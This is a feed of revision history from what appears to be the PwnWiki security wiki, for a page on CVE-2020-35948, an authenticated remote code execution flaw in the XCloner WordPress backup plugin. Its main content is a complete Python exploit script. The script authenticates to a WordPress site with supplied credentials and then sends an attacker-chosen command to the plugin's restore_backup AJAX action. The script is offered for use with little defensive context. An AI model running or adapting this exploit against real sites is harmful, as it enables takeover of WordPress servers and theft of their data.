https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2020-35948 wordpress Plugin XCloner 4.2.12 遠程代碼執行漏洞 - Revision history
2026-04-10T12:21:41Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=6120&oldid=prev
Pwnwiki: Marked this version for translation
2021-07-02T03:15:20Z
<p>Marked this version for translation</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 03:15, 2 July 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==漏洞影響==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==漏洞影響== <ins class="diffchange diffchange-inline"><!--T:1--></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: 4.2.1 - 4.2.12</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: 4.2.1 - 4.2.12</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-6117:rev-6120 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=CVE-2020-35948_wordpress_Plugin_XCloner_4.2.12_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=6117&oldid=prev
Pwnwiki: Created page with "<languages /> <translate> ==漏洞影響== </translate> Version: 4.2.1 - 4.2.12 ==EXP== <pre> # Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authen..."
2021-07-02T03:14:51Z
<p>Created page with "<languages /> <translate> ==漏洞影響== </translate> Version: 4.2.1 - 4.2.12 ==EXP== <pre> # Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authen..."</p>
<p><b>New page</b></p><div><languages /><br />
<translate><br />
==漏洞影響==<br />
</translate><br />
Version: 4.2.1 - 4.2.12<br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)<br />
# Date 30.06.2021<br />
# Exploit Author: Ron Jost (Hacker5preme)<br />
# Vendor Homepage: https://www.xcloner.com/<br />
# Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip<br />
# Version: 4.2.1 - 4.2.12<br />
# Tested on: Ubuntu 18.04<br />
# CVE: CVE-2020-35948<br />
# CWE: CWE-732<br />
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md<br />
<br />
'''<br />
Description:<br />
An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, <br />
including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, <br />
for example. Alternatively, an attacker could create an exploit chain to obtain a database dump.<br />
'''<br />
<br />
<br />
'''<br />
Banner:<br />
'''<br />
banner = """<br />
<br />
<br />
##### # # ####### ##### ### ##### ### ##### ####### ##### # ##### <br />
# # # # # # # # # # # # # # # # # # # # # # <br />
# # # # # # # # # # # # # # # # # # <br />
# # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # ##### <br />
# # # # # # # # # # # # # ####### # # <br />
# # # # # # # # # # # # # # # # # # # # <br />
##### # ####### ####### ### ####### ### ##### ##### ##### # ##### <br />
<br />
<br />
<br />
by @Hacker5preme<br />
"""<br />
print(banner)<br />
<br />
<br />
'''<br />
Import required modules:<br />
'''<br />
import requests<br />
import argparse<br />
<br />
<br />
'''<br />
User-Input:<br />
'''<br />
my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)')<br />
my_parser.add_argument('-T', '--IP', type=str)<br />
my_parser.add_argument('-P', '--PORT', type=str)<br />
my_parser.add_argument('-U', '--PATH', type=str)<br />
my_parser.add_argument('-u', '--USERNAME', type=str)<br />
my_parser.add_argument('-p', '--PASSWORD', type=str)<br />
args = my_parser.parse_args()<br />
target_ip = args.IP<br />
target_port = args.PORT<br />
wp_path = args.PATH<br />
username = args.USERNAME<br />
password = args.PASSWORD<br />
print('')<br />
ajax_cmd = input('[*] Ajax Command to execute: ')<br />
<br />
'''<br />
Authentication:<br />
'''<br />
session = requests.Session()<br />
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />
<br />
# Header:<br />
header = {<br />
'Host': target_ip,<br />
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br />
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br />
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br />
'Accept-Encoding': 'gzip, deflate',<br />
'Content-Type': 'application/x-www-form-urlencoded',<br />
'Origin': 'http://' + target_ip,<br />
'Connection': 'close',<br />
'Upgrade-Insecure-Requests': '1'<br />
}<br />
<br />
# Body:<br />
body = {<br />
'log': username, <br />
'pwd': password, <br />
'wp-submit': 'Log In', <br />
'testcookie': '1'<br />
}<br />
<br />
# Authenticate:<br />
print('')<br />
auth = session.post(auth_url, headers=header, data=body)<br />
auth_header= auth.headers['Set-Cookie']<br />
if 'wordpress_logged_in' in auth_header:<br />
print('[+] Authentication successfull !')<br />
else:<br />
print('[-] Authentication failed !')<br />
exit()<br />
<br />
<br />
'''<br />
Exploit:<br />
'''<br />
url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"<br />
<br />
header = {<br />
"Accept": "*/*",<br />
"Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357",<br />
"Connection": "close"<br />
}<br />
<br />
# Body:<br />
body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)<br />
<br />
exploit = session.post(url_exploit, headers=header, data=body)<br />
print('')<br />
print(exploit.text)<br />
print('')<br />
</pre></div>
Pwnwiki